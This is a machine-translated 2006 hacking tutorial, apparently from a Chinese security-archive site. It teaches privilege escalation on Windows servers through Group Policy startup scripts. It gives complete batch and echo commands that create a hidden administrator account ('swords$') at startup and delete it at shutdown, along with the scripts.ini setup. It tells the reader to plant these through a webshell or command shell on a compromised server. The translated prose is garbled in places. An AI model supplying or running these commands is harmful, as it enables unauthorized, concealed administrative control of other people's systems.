Elevated administrator permissions:startup script method-vulnerability warning-the black bar safety net

2006-03-31T00:00:00
ID MYHACK58:6220068459
Type myhack58
Reporter 佚名
Modified 2006-03-31T00:00:00

Description

We watched“my non-I[F. S. T]”summary elevated administrator privileges 8 of the law, and now we use the startup script and batch in to get the shell of the case under the elevated No. 9: startup script method! of! The first batch of leakage Ah, we can get optimistic, and I try to cut the crap, concise statements. Note: the startup script is to ask the user to login before running the batch,its function is similar to Win9X and DOS automatically executed batch file, the autoexec. bat,since the script is in the windows login before the run,so we can modify the script content to the system settings,such as start a backdoor program,to add an administrator account,modify the administrator account, etc., whatever you want to it. Quack.. This article first introduced by webshell to add a hidden account(after all it is everyone's concern:)),and then specifically explain the problems after the solution. How to add an account? A. If you can write directly to the file,such as the use of the ocean. (1) First, we use the ocean had written a new administrator the batch file swords1. bat,as follows: net user swords$Content$nbsp;eviloctal /add net localgroup administrators swords$Content$nbsp;/add This batch file add an administrator named swords$,password for eviloctal hidden account, file swords1. bat Save to"C:\winnt\system32\GroupPolicy\Machine\Scripts\Startup". (Note: c:\winnt is the system directory, if the system disk is not c drive, make the appropriate modifications to the system directory. In the present machine in view, you may not found GroupPolicy\Machine\Scripts\Startup in this folder,you can select Tools/folder Options/View/click Show hidden files and folders. In the ocean with the fso you can display all the files you do not have to reinvent the wheel.) (2)next, write a delete administrator batch file swords2. bat,very simple, in a word, as follows: net user swords$Content$nbsp;/del This batch file delete an administrator named swords$hidden account, file swords2. bat Save to"C:\winnt\system32\GroupPolicy\Machine\Scripts\Shutdown". (3)write a startup/shutdown script configuration file scripts. ini Note: the scripts is the default configuration file name, not renamed game! As follows: [Startup] 0CmdLine=swords1. bat 0Parameters= [Shutdown] 0CmdLine=swords2. bat 0Parameters= The file scripts. ini save it to C:\winnt\system32\GroupPolicy\Machine\Scripts. II. If you have a cmdshell,there echo the permissions on it,so add: (1)echo a swords1. vbs starts with the file echo on error resume next> C:\winnt\system32\GroupPolicy\Machine\Scripts\Startup \swords1. vbs echo net user swords$Content$nbsp;eviloctal /add>> C:\winnt\system32\GroupPolicy\Machine\Scripts\Startup\swords1.vbs echo net localgroup administrators swords$Content$nbsp;/add>> C:\winnt\system32\GroupPolicy\Machine\Scripts\Startup\swords1.vbs Note:the first line must be’>’,so as to delete the original data. (2)echo a swords2. the vbs closed with a script file echo net user swords$Content$nbsp;/del> C:\winnt\system32\GroupPolicy\Machine\Scripts\Shutdown\swords2.vbs (3)write a startup/shutdown script configuration file scripts. ini echo [Startup] > C:\winnt\system32\GroupPolicy\Machine\Scripts\scripts.ini echo 0CmdLine=swords1. vbs >>C:\winnt\system32\GroupPolicy\Machine\Scripts\scripts.ini echo 0Parameters= >>C:\winnt\system32\GroupPolicy\Machine\Scripts\scripts.ini echo [Shutdown] >>C:\winnt\system32\GroupPolicy\Machine\Scripts\scripts.ini echo 0CmdLine=swords2. vbs>>C:\winnt\system32\GroupPolicy\Machine\Scripts\scripts.ini echo 0Parameters=>>C:\winnt\system32\GroupPolicy\Machine\Scripts\scripts.ini The file scripts. ini save it to C:\winnt\system32\GroupPolicy\Machine\Scripts. Finally, wait for the server to restart the computer or yourself to force it to start(means a lot.)。 And then you're waiting to play it. Note: This method, provided the server has been assigned a computer startup script,otherwise the method may not be successful. III. If you are a native, or has been connected to the other side of the 3 3 8 9, but only ordinary user permissions, how to do? In the Enable computer startup/shutdown script before,must be assigned. To assign computer startup/shutdown scripts required by the Group Policy MMC, Management Console Management Unit: (1) Start/Run/MMC,open the Microsoft console (2) Press the ctrl+M KEY, open the Add/Remove Snap-in window, click Add. (3) in the"Add Standalone Snap-in"dialog box select"Group Policy",click the"Add"button. (4) Select the default of"Local Computer"Group Policy object/completed/OK/OK, close the window. (5) in the generated“local computer”policy, open Computer Configuration/Windows Settings/scripts(startup/shutdown)"node,double-click the"start"or"shutdown"item to set the computer to start or shut down when using the script, click the Browse plus if you want to start the script file, OK. (6)Set up,save, exit the Group Policy MMC snap-in. And other Group Policy refresh,the scripts will be in the computer startup, and shutdown. Note: You can also directly open the gpedit. msc, expand the Computer Configuration/Windows Settings/scripts(startup/shutdown),then add a startup script. Then expand“Computer Configuration/Administrative Templates/System/login, the“display start-up script to run the state”enabled. After restarting look at it, open cmd, enter net user swords$display detailed information 噶噶, one user.